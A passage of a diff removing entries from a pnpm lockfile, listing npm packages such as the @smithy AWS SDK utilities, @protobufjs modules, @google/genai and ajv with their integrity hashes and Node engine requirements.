-    engines: {node: '>=18.0.0'}
-
-  '@babel/runtime@7.28.6':
-    resolution: {integrity: sha512-05WQkdpL9COIMz4LjTxGpPNCdlpyimKppYNoJ5Di5EUObifl8t4tuLuUBBZEpoLYOmfvIWrsp9fCl0HoPRVTdA==}
-    engines: {node: '>=6.9.0'}
-
-  '@google/genai@1.45.0':
-    resolution: {integrity: sha512-+sNRWhKiRibVgc4OKi7aBJJ0A7RcoVD8tGG+eFkqxAWRjASDW+ktS9lLwTDnAxZICzCVoeAdu8dYLJVTX60N9w==}
-    engines: {node: '>=20.0.0'}
-    peerDependencies:
-      '@modelcontextprotocol/sdk': ^1.25.2
-    peerDependenciesMeta:
-      '@modelcontextprotocol/sdk':
-        optional: true
-
-  '@isaacs/cliui@8.0.2':
-    resolution: {integrity: sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==}
-    engines: {node: '>=12'}
-
-  '@mistralai/mistralai@1.14.1':
-    resolution: {integrity: sha512-IiLmmZFCCTReQgPAT33r7KQ1nYo5JPdvGkrkZqA8qQ2qB1GHgs5LoP5K2ICyrjnpw2n8oSxMM/VP+liiKcGNlQ==}
-
-  '@pkgjs/parseargs@0.11.0':
-    resolution: {integrity: sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==}
-    engines: {node: '>=14'}
-
-  '@protobufjs/aspromise@1.1.2':
-    resolution: {integrity: sha512-j+gKExEuLmKwvz3OgROXtrJ2UG2x8Ch2YZUxahh+s1F2HZ+wAceUNLkvy6zKCPVRkU++ZWQrdxsUeQXmcg4uoQ==}
-
-  '@protobufjs/base64@1.1.2':
-    resolution: {integrity: sha512-AZkcAA5vnN/v4PDqKyMR5lx7hZttPDgClv83E//FMNhR2TMcLUhfRUBHCmSl0oi9zMgDDqRUJkSxO3wm85+XLg==}
-
-  '@protobufjs/codegen@2.0.4':
-    resolution: {integrity: sha512-YyFaikqM5sH0ziFZCN3xDC7zeGaB/d0IUb9CATugHWbd1FRFwWwt4ld4OYMPWu5a3Xe01mGAULCdqhMlPl29Jg==}
-
-  '@protobufjs/eventemitter@1.1.0':
-    resolution: {integrity: sha512-j9ednRT81vYJ9OfVuXG6ERSTdEL1xVsNgqpkxMsbIabzSo3goCjDIveeGv5d03om39ML71RdmrGNjG5SReBP/Q==}
-
-  '@protobufjs/fetch@1.1.0':
-    resolution: {integrity: sha512-lljVXpqXebpsijW71PZaCYeIcE5on1w5DlQy5WH6GLbFryLUrBD4932W/E2BSpfRJWseIL4v/KPgBFxDOIdKpQ==}
-
-  '@protobufjs/float@1.0.2':
-    resolution: {integrity: sha512-Ddb+kVXlXst9d+R9PfTIxh1EdNkgoRe5tOX6t01f1lYWOvJnSPDBlG241QLzcyPdoNTsblLUdujGSE4RzrTZGQ==}
-
-  '@protobufjs/inquire@1.1.0':
-    resolution: {integrity: sha512-kdSefcPdruJiFMVSbn801t4vFK7KB/5gd2fYvrxhuJYg8ILrmn9SKSX2tZdV6V+ksulWqS7aXjBcRXl3wHoD9Q==}
-
-  '@protobufjs/path@1.1.2':
-    resolution: {integrity: sha512-6JOcJ5Tm08dOHAbdR3GrvP+yUUfkjG5ePsHYczMFLq3ZmMkAD98cDgcT2iA1lJ9NVwFd4tH/iSSoe44YWkltEA==}
-
-  '@protobufjs/pool@1.1.0':
-    resolution: {integrity: sha512-0kELaGSIDBKvcgS4zkjz1PeddatrjYcmMWOlAuAPwAeccUrPHdUqo/J6LiymHHEiJT5NrF1UVwxY14f+fy4WQw==}
-
-  '@protobufjs/utf8@1.1.0':
-    resolution: {integrity: sha512-Vvn3zZrhQZkkBE8LSuW3em98c0FwgO4nxzv6OdSxPKJIEKY2bGbHn+mhGIPerzI4twdxaP8/0+06HBpwf345Lw==}
-
-  '@sinclair/typebox@0.34.48':
-    resolution: {integrity: sha512-kKJTNuK3AQOrgjjotVxMrCn1sUJwM76wMszfq1kdU4uYVJjvEWuFQ6HgvLt4Xz3fSmZlTOxJ/Ie13KnIcWQXFA==}
-
-  '@smithy/abort-controller@4.2.12':
-    resolution: {integrity: sha512-xolrFw6b+2iYGl6EcOL7IJY71vvyZ0DJ3mcKtpykqPe2uscwtzDZJa1uVQXyP7w9Dd+kGwYnPbMsJrGISKiY/Q==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/config-resolver@4.4.11':
-    resolution: {integrity: sha512-YxFiiG4YDAtX7WMN7RuhHZLeTmRRAOyCbr+zB8e3AQzHPnUhS8zXjB1+cniPVQI3xbWsQPM0X2aaIkO/ME0ymw==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/core@3.23.12':
-    resolution: {integrity: sha512-o9VycsYNtgC+Dy3I0yrwCqv9CWicDnke0L7EVOrZtJpjb2t0EjaEofmMrYc0T1Kn3yk32zm6cspxF9u9Bj7e5w==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/credential-provider-imds@4.2.12':
-    resolution: {integrity: sha512-cr2lR792vNZcYMriSIj+Um3x9KWrjcu98kn234xA6reOAFMmbRpQMOv8KPgEmLLtx3eldU6c5wALKFqNOhugmg==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/eventstream-codec@4.2.12':
-    resolution: {integrity: sha512-FE3bZdEl62ojmy8x4FHqxq2+BuOHlcxiH5vaZ6aqHJr3AIZzwF5jfx8dEiU/X0a8RboyNDjmXjlbr8AdEyLgiA==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/eventstream-serde-browser@4.2.12':
-    resolution: {integrity: sha512-XUSuMxlTxV5pp4VpqZf6Sa3vT/Q75FVkLSpSSE3KkWBvAQWeuWt1msTv8fJfgA4/jcJhrbrbMzN1AC/hvPmm5A==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/eventstream-serde-config-resolver@4.3.12':
-    resolution: {integrity: sha512-7epsAZ3QvfHkngz6RXQYseyZYHlmWXSTPOfPmXkiS+zA6TBNo1awUaMFL9vxyXlGdoELmCZyZe1nQE+imbmV+Q==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/eventstream-serde-node@4.2.12':
-    resolution: {integrity: sha512-D1pFuExo31854eAvg89KMn9Oab/wEeJR6Buy32B49A9Ogdtx5fwZPqBHUlDzaCDpycTFk2+fSQgX689Qsk7UGA==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/eventstream-serde-universal@4.2.12':
-    resolution: {integrity: sha512-+yNuTiyBACxOJUTvbsNsSOfH9G9oKbaJE1lNL3YHpGcuucl6rPZMi3nrpehpVOVR2E07YqFFmtwpImtpzlouHQ==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/fetch-http-handler@5.3.15':
-    resolution: {integrity: sha512-T4jFU5N/yiIfrtrsb9uOQn7RdELdM/7HbyLNr6uO/mpkj1ctiVs7CihVr51w4LyQlXWDpXFn4BElf1WmQvZu/A==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/hash-node@4.2.12':
-    resolution: {integrity: sha512-QhBYbGrbxTkZ43QoTPrK72DoYviDeg6YKDrHTMJbbC+A0sml3kSjzFtXP7BtbyJnXojLfTQldGdUR0RGD8dA3w==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/invalid-dependency@4.2.12':
-    resolution: {integrity: sha512-/4F1zb7Z8LOu1PalTdESFHR0RbPwHd3FcaG1sI3UEIriQTWakysgJr65lc1jj6QY5ye7aFsisajotH6UhWfm/g==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/is-array-buffer@2.2.0':
-    resolution: {integrity: sha512-GGP3O9QFD24uGeAXYUjwSTXARoqpZykHadOmA8G5vfJPK0/DC67qa//0qvqrJzL1xc8WQWX7/yc7fwudjPHPhA==}
-    engines: {node: '>=14.0.0'}
-
-  '@smithy/is-array-buffer@4.2.2':
-    resolution: {integrity: sha512-n6rQ4N8Jj4YTQO3YFrlgZuwKodf4zUFs7EJIWH86pSCWBaAtAGBFfCM7Wx6D2bBJ2xqFNxGBSrUWswT3M0VJow==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/middleware-content-length@4.2.12':
-    resolution: {integrity: sha512-YE58Yz+cvFInWI/wOTrB+DbvUVz/pLn5mC5MvOV4fdRUc6qGwygyngcucRQjAhiCEbmfLOXX0gntSIcgMvAjmA==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/middleware-endpoint@4.4.26':
-    resolution: {integrity: sha512-8Qfikvd2GVKSm8S6IbjfwFlRY9VlMrj0Dp4vTwAuhqbX7NhJKE5DQc2bnfJIcY0B+2YKMDBWfvexbSZeejDgeg==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/middleware-retry@4.4.43':
-    resolution: {integrity: sha512-ZwsifBdyuNHrFGmbc7bAfP2b54+kt9J2rhFd18ilQGAB+GDiP4SrawqyExbB7v455QVR7Psyhb2kjULvBPIhvA==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/middleware-serde@4.2.15':
-    resolution: {integrity: sha512-ExYhcltZSli0pgAKOpQQe1DLFBLryeZ22605y/YS+mQpdNWekum9Ujb/jMKfJKgjtz1AZldtwA/wCYuKJgjjlg==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/middleware-stack@4.2.12':
-    resolution: {integrity: sha512-kruC5gRHwsCOuyCd4ouQxYjgRAym2uDlCvQ5acuMtRrcdfg7mFBg6blaxcJ09STpt3ziEkis6bhg1uwrWU7txw==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/node-config-provider@4.3.12':
-    resolution: {integrity: sha512-tr2oKX2xMcO+rBOjobSwVAkV05SIfUKz8iI53rzxEmgW3GOOPOv0UioSDk+J8OpRQnpnhsO3Af6IEBabQBVmiw==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/node-http-handler@4.5.0':
-    resolution: {integrity: sha512-Rnq9vQWiR1+/I6NZZMNzJHV6pZYyEHt2ZnuV3MG8z2NNenC4i/8Kzttz7CjZiHSmsN5frhXhg17z3Zqjjhmz1A==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/property-provider@4.2.12':
-    resolution: {integrity: sha512-jqve46eYU1v7pZ5BM+fmkbq3DerkSluPr5EhvOcHxygxzD05ByDRppRwRPPpFrsFo5yDtCYLKu+kreHKVrvc7A==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/protocol-http@5.3.12':
-    resolution: {integrity: sha512-fit0GZK9I1xoRlR4jXmbLhoN0OdEpa96ul8M65XdmXnxXkuMxM0Y8HDT0Fh0Xb4I85MBvBClOzgSrV1X2s1Hxw==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/querystring-builder@4.2.12':
-    resolution: {integrity: sha512-6wTZjGABQufekycfDGMEB84BgtdOE/rCVTov+EDXQ8NHKTUNIp/j27IliwP7tjIU9LR+sSzyGBOXjeEtVgzCHg==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/querystring-parser@4.2.12':
-    resolution: {integrity: sha512-P2OdvrgiAKpkPNKlKUtWbNZKB1XjPxM086NeVhK+W+wI46pIKdWBe5QyXvhUm3MEcyS/rkLvY8rZzyUdmyDZBw==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/service-error-classification@4.2.12':
-    resolution: {integrity: sha512-LlP29oSQN0Tw0b6D0Xo6BIikBswuIiGYbRACy5ujw/JgWSzTdYj46U83ssf6Ux0GyNJVivs2uReU8pt7Eu9okQ==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/shared-ini-file-loader@4.4.7':
-    resolution: {integrity: sha512-HrOKWsUb+otTeo1HxVWeEb99t5ER1XrBi/xka2Wv6NVmTbuCUC1dvlrksdvxFtODLBjsC+PHK+fuy2x/7Ynyiw==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/signature-v4@5.3.12':
-    resolution: {integrity: sha512-B/FBwO3MVOL00DaRSXfXfa/TRXRheagt/q5A2NM13u7q+sHS59EOVGQNfG7DkmVtdQm5m3vOosoKAXSqn/OEgw==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/smithy-client@4.12.6':
-    resolution: {integrity: sha512-aib3f0jiMsJ6+cvDnXipBsGDL7ztknYSVqJs1FdN9P+u9tr/VzOR7iygSh6EUOdaBeMCMSh3N0VdyYsG4o91DQ==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/types@4.13.1':
-    resolution: {integrity: sha512-787F3yzE2UiJIQ+wYW1CVg2odHjmaWLGksnKQHUrK/lYZSEcy1msuLVvxaR/sI2/aDe9U+TBuLsXnr3vod1g0g==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/url-parser@4.2.12':
-    resolution: {integrity: sha512-wOPKPEpso+doCZGIlr+e1lVI6+9VAKfL4kZWFgzVgGWY2hZxshNKod4l2LXS3PRC9otH/JRSjtEHqQ/7eLciRA==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/util-base64@4.3.2':
-    resolution: {integrity: sha512-XRH6b0H/5A3SgblmMa5ErXQ2XKhfbQB+Fm/oyLZ2O2kCUrwgg55bU0RekmzAhuwOjA9qdN5VU2BprOvGGUkOOQ==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/util-body-length-browser@4.2.2':
-    resolution: {integrity: sha512-JKCrLNOup3OOgmzeaKQwi4ZCTWlYR5H4Gm1r2uTMVBXoemo1UEghk5vtMi1xSu2ymgKVGW631e2fp9/R610ZjQ==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/util-body-length-node@4.2.3':
-    resolution: {integrity: sha512-ZkJGvqBzMHVHE7r/hcuCxlTY8pQr1kMtdsVPs7ex4mMU+EAbcXppfo5NmyxMYi2XU49eqaz56j2gsk4dHHPG/g==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/util-buffer-from@2.2.0':
-    resolution: {integrity: sha512-IJdWBbTcMQ6DA0gdNhh/BwrLkDR+ADW5Kr1aZmd4k3DIF6ezMV4R2NIAmT08wQJ3yUK82thHWmC/TnK/wpMMIA==}
-    engines: {node: '>=14.0.0'}
-
-  '@smithy/util-buffer-from@4.2.2':
-    resolution: {integrity: sha512-FDXD7cvUoFWwN6vtQfEta540Y/YBe5JneK3SoZg9bThSoOAC/eGeYEua6RkBgKjGa/sz6Y+DuBZj3+YEY21y4Q==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/util-config-provider@4.2.2':
-    resolution: {integrity: sha512-dWU03V3XUprJwaUIFVv4iOnS1FC9HnMHDfUrlNDSh4315v0cWyaIErP8KiqGVbf5z+JupoVpNM7ZB3jFiTejvQ==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/util-defaults-mode-browser@4.3.42':
-    resolution: {integrity: sha512-0vjwmcvkWAUtikXnWIUOyV6IFHTEeQUYh3JUZcDgcszF+hD/StAsQ3rCZNZEPHgI9kVNcbnyc8P2CBHnwgmcwg==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/util-defaults-mode-node@4.2.45':
-    resolution: {integrity: sha512-q5dOqqfTgUcLe38TAGiFn9srToKj2YCHJ34QGOLzM+xYLLA+qRZv7N+33kl1MERVusue36ZHnlNaNEvY/PzSrw==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/util-endpoints@3.3.3':
-    resolution: {integrity: sha512-VACQVe50j0HZPjpwWcjyT51KUQ4AnsvEaQ2lKHOSL4mNLD0G9BjEniQ+yCt1qqfKfiAHRAts26ud7hBjamrwig==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/util-hex-encoding@4.2.2':
-    resolution: {integrity: sha512-Qcz3W5vuHK4sLQdyT93k/rfrUwdJ8/HZ+nMUOyGdpeGA1Wxt65zYwi3oEl9kOM+RswvYq90fzkNDahPS8K0OIg==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/util-middleware@4.2.12':
-    resolution: {integrity: sha512-Er805uFUOvgc0l8nv0e0su0VFISoxhJ/AwOn3gL2NWNY2LUEldP5WtVcRYSQBcjg0y9NfG8JYrCJaYDpupBHJQ==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/util-retry@4.2.12':
-    resolution: {integrity: sha512-1zopLDUEOwumjcHdJ1mwBHddubYF8GMQvstVCLC54Y46rqoHwlIU+8ZzUeaBcD+WCJHyDGSeZ2ml9YSe9aqcoQ==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/util-stream@4.5.20':
-    resolution: {integrity: sha512-4yXLm5n/B5SRBR2p8cZ90Sbv4zL4NKsgxdzCzp/83cXw2KxLEumt5p+GAVyRNZgQOSrzXn9ARpO0lUe8XSlSDw==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/util-uri-escape@4.2.2':
-    resolution: {integrity: sha512-2kAStBlvq+lTXHyAZYfJRb/DfS3rsinLiwb+69SstC9Vb0s9vNWkRwpnj918Pfi85mzi42sOqdV72OLxWAISnw==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/util-utf8@2.3.0':
-    resolution: {integrity: sha512-R8Rdn8Hy72KKcebgLiv8jQcQkXoLMOGGv5uI1/k0l+snqkOzQ1R0ChUBCxWMlBsFMekWjq0wRudIweFs7sKT5A==}
-    engines: {node: '>=14.0.0'}
-
-  '@smithy/util-utf8@4.2.2':
-    resolution: {integrity: sha512-75MeYpjdWRe8M5E3AW0O4Cx3UadweS+cwdXjwYGBW5h/gxxnbeZ877sLPX/ZJA9GVTlL/qG0dXP29JWFCD1Ayw==}
-    engines: {node: '>=18.0.0'}
-
-  '@smithy/uuid@1.1.2':
-    resolution: {integrity: sha512-O/IEdcCUKkubz60tFbGA7ceITTAJsty+lBjNoorP4Z6XRqaFb/OjQjZODophEcuq68nKm6/0r+6/lLQ+XVpk8g==}
-    engines: {node: '>=18.0.0'}
-
-  '@tootallnate/quickjs-emscripten@0.23.0':
-    resolution: {integrity: sha512-C5Mc6rdnsaJDjO3UpGW/CQTHtCKaYlScZTly4JIu97Jxo/odCiH0ITnDXSJPTOrEKk/ycSZ0AOgTmkDtkOsvIA==}
-
-  '@types/node@25.5.0':
-    resolution: {integrity: sha512-jp2P3tQMSxWugkCUKLRPVUpGaL5MVFwF8RDuSRztfwgN1wmqJeMSbKlnEtQqU8UrhTmzEmZdu2I6v2dpp7XIxw==}
-
-  '@types/retry@0.12.0':
-    resolution: {integrity: sha512-wWKOClTTiizcZhXnPY4wikVAwmdYHp8q6DmC+EJUzAMsycb7HB32Kh9RN4+0gExjmPmZSAQjgURXIGATPegAvA==}
-
-  agent-base@7.1.4:
-    resolution: {integrity: sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==}
-    engines: {node: '>= 14'}
-
-  ajv-formats@3.0.1:
-    resolution: {integrity: sha512-8iUql50EUR+uUcdRQ3HDqa6EVyo3docL8g5WJ3FNcWmu62IbkGUue/pEyLBW8VGKKucTPgqeks4fIU1DA4yowQ==}
-    peerDependencies:
-      ajv: ^8.0.0
-    peerDependenciesMeta:
-      ajv:
-        optional: true
-
-  ajv@8.18.0:
-    resolution: {integrity: sha512-PlXPeEWMXMZ7sPYOHqmDyCJzcfNrUr3fGNKtezX14ykXOEIvyK81d+qydx89KY5O71FKMPaQ2vBfBFI5NHR63A==}
-
-  ansi-regex@5.0.1:
-    resolution: {integrity: sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==}
-    engines: {node: '>=8'}
-
-  ansi-regex@6.2.2:
-    resolution: {integrity: sha512-Bq3SmSpyFHaWjPk8If9yc6svM8c56dB5BAtW4Qbw5jHTwwXXcTLoRMkpDJp6VL0XzlWaCHTXrkFURMYmD0sLqg==}
-    engines: {node: '>=12'}
-
-  ansi-styles@4.3.0:
-    resolution: {integrity: sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==}
-    engines: {node: '>=8'}
-
-  ansi-styles@6.2.3:
-    resolution: {integrity: sha512-4Dj6M28JB+oAH8kFkTLUo+a2jwOFkuqb3yucU0CANcRRUbxS0cP0nZYCGjcc3BNXwRIsUVmDGgzawme7zvJHvg==}
-    engines: {node: '>=12'}
-
-  ast-types@0.13.4:
-    resolution: {integrity: sha512-x1FCFnFifvYDDzTaLII71vG5uvDwgtmDTEVWAxrgeiR8VjMONcCXJx7E+USjDtHlwFmt9MysbqgF9b9Vjr6w+w==}
-    engines: {node: '>=4'}
-
-  balanced-match@1.0.2:
-    resolution: {integrity: sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==}
-
-  base64-js@1.5.1:
-    resolution: {integrity: sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==}
-
-  basic-ftp@5.2.0:
-    resolution: {integrity: sha512-VoMINM2rqJwJgfdHq6RiUudKt2BV+FY5ZFezP/ypmwayk68+NzzAQy4XXLlqsGD4MCzq3DrmNFD/uUmBJuGoXw==}
-    engines: {node: '>=10.0.0'}
-
-  bignumber.js@9.3.1:
-    resolution: {integrity: sha512-Ko0uX15oIUS7wJ3Rb30Fs6SkVbLmPBAKdlm7q9+ak9bbIeFf0MwuBsQV6z7+X768/cHsfg+WlysDWJcmthjsjQ==}
-
-  bowser@2.14.1:
-    resolution: {integrity: sha512-tzPjzCxygAKWFOJP011oxFHs57HzIhOEracIgAePE4pqB3LikALKnSzUyU4MGs9/iCEUuHlAJTjTc5M+u7YEGg==}
-
-  brace-expansion@2.0.2:
-    resolution: {integrity: sha512-Jt0vHyM+jmUBqojB7E1NIYadt0vI0Qxjxd2TErW94wDz+E2LAm5vKMXXwg6ZZBTHPuUlDgQHKXvjGBdfcF1ZDQ==}
-
-  buffer-equal-constant-time@1.0.1:
-    resolution: {integrity: sha512-zRpUiDwd/xk6ADqPMATG8vc9VPrkck7T07OIx0gnjmJAnHnTVXNQG3vfvWNuiZIkwu9KrKdA1iJKfsfTVxE6NA==}
-
-  chalk@5.6.2:
-    resolution: {integrity: sha512-7NzBL0rN6fMUW+f7A6Io4h40qQlG+xGmtMxfbnH/K7TAtt8JQWVQK+6g0UXKMeVJoyV5EkkNsErQ8pVD3bLHbA==}
-    engines: {node: ^12.17.0 || ^14.13 || >=16.0.0}
-
-  color-convert@2.0.1:
-    resolution: {integrity: sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==}
-    engines: {node: '>=7.0.0'}
-
-  color-name@1.1.4:
-    resolution: {integrity: sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==}
-
-  cross-spawn@7.0.6:
-    resolution: {integrity: sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==}
-    engines: {node: '>= 8'}
-
-  data-uri-to-buffer@4.0.1:
-    resolution: {integrity: sha512-0R9ikRb668HB7QDxT1vkpuUBtqc53YyAwMwGeUFKRojY/NWKvdZ+9UYtRfGmhqNbRkTSVpMbmyhXipFFv2cb/A==}
-    engines: {node: '>= 12'}
-
-  data-uri-to-buffer@6.0.2:
-    resolution: {integrity: sha512-7hvf7/GW8e86rW0ptuwS3OcBGDjIi6SZva7hCyWC0yYry2cOPmLIjXAUHI6DK2HsnwJd9ifmt57i8eV2n4YNpw==}
-    engines: {node: '>= 14'}
-
-  debug@4.4.3:
-    resolution: {integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==}
-    engines: {node: '>=6.0'}
-    peerDependencies:
-      supports-color: '*'
-    peerDependenciesMeta:
-      supports-color:
-        optional: true
-
-  degenerator@5.0.1:
-    resolution: {integrity: sha512-TllpMR/t0M5sqCXfj85i4XaAzxmS5tVA16dqvdkMwGmzI+dXLXnw3J+3Vdv7VKw+ThlTMboK6i9rnZ6Nntj5CQ==}
-    engines: {node: '>= 14'}
-
-  eastasianwidth@0.2.0:
-    resolution: {integrity: sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==}
-
-  ecdsa-sig-formatter@1.0.11:
-    resolution: {integrity: sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ==}
-
-  emoji-regex@8.0.0:
-    resolution: {integrity: sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==}
-
-  emoji-regex@9.2.2:
-    resolution: {integrity: sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==}
-
-  escodegen@2.1.0:
-    resolution: {integrity: sha512-2NlIDTwUWJN0mRPQOdtQBzbUHvdGY2P1VXSyU83Q3xKxM7WHX2Ql8dKq782Q9TgQUNOLEzEYu9bzLNj1q88I5w==}
-    engines: {node: '>=6.0'}
-    hasBin: true
-
-  esprima@4.0.1:
-    resolution: {integrity: sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==}
-    engines: {node: '>=4'}
-    hasBin: true
-
-  estraverse@5.3.0:
-    resolution: {integrity: sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==}
-    engines: {node: '>=4.0'}
-
-  esutils@2.0.3:
-    resolution: {integrity: sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==}
-    engines: {node: '>=0.10.0'}
-
-  extend@3.0.2:
-    resolution: {integrity: sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==}
-
-  fast-deep-equal@3.1.3:
-    resolution: {integrity: sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==}
-
-  fast-uri@3.1.0:
-    resolution: {integrity: sha512-iPeeDKJSWf4IEOasVVrknXpaBV0IApz/gp7S2bb7Z4Lljbl2MGJRqInZiUrQwV16cpzw/D3S5j5Julj/gT52AA==}
-
-  fast-xml-builder@1.1.4:
-    resolution: {integrity: sha512-f2jhpN4Eccy0/Uz9csxh3Nu6q4ErKxf0XIsasomfOihuSUa3/xw6w8dnOtCDgEItQFJG8KyXPzQXzcODDrrbOg==}
-
-  fast-xml-parser@5.4.1:
-    resolution: {integrity: sha512-BQ30U1mKkvXQXXkAGcuyUA/GA26oEB7NzOtsxCDtyu62sjGw5QraKFhx2Em3WQNjPw9PG6MQ9yuIIgkSDfGu5A==}
-    hasBin: true
-
-  fetch-blob@3.2.0:
-    resolution: {integrity: sha512-7yAQpD2UMJzLi1Dqv7qFYnPbaPx7ZfFK6PiIxQ4PfkGPyNyl2Ugx+a/umUonmKqjhM4DnfbMvdX6otXq83soQQ==}
-    engines: {node: ^12.20 || >= 14.13}
-
-  foreground-child@3.3.1:
-    resolution: {integrity: sha512-gIXjKqtFuWEgzFRJA9WCQeSJLZDjgJUOMCMzxtvFq/37KojM1BFGufqsCy0r4qSQmYLsZYMeyRqzIWOMup03sw==}
-    engines: {node: '>=14'}
-
-  formdata-polyfill@4.0.10:
-    resolution: {integrity: sha512-buewHzMvYL29jdeQTVILecSaZKnt/RJWjoZCF5OW60Z67/GmSLBkOFM7qh1PI3zFNtJbaZL5eQu1vLfazOwj4g==}
-    engines: {node: '>=12.20.0'}
-
-  gaxios@7.1.3:
-    resolution: {integrity: sha512-YGGyuEdVIjqxkxVH1pUTMY/XtmmsApXrCVv5EU25iX6inEPbV+VakJfLealkBtJN69AQmh1eGOdCl9Sm1UP6XQ==}
-    engines: {node: '>=18'}
-
-  gcp-metadata@8.1.2:
-    resolution: {integrity: sha512-zV/5HKTfCeKWnxG0Dmrw51hEWFGfcF2xiXqcA3+J90WDuP0SvoiSO5ORvcBsifmx/FoIjgQN3oNOGaQ5PhLFkg==}
-    engines: {node: '>=18'}
-
-  get-uri@6.0.5:
-    resolution: {integrity: sha512-b1O07XYq8eRuVzBNgJLstU6FYc1tS6wnMtF1I1D9lE8LxZSOGZ7LhxN54yPP6mGw5f2CkXY2BQUL9Fx41qvcIg==}
-    engines: {node: '>= 14'}
-
-  glob@10.5.0:
-    resolution: {integrity: sha512-DfXN8DfhJ7NH3Oe7cFmu3NCu1wKbkReJ8TorzSAFbSKrlNaQSKfIzqYqVY8zlbs2NLBbWpRiU52GX2PbaBVNkg==}
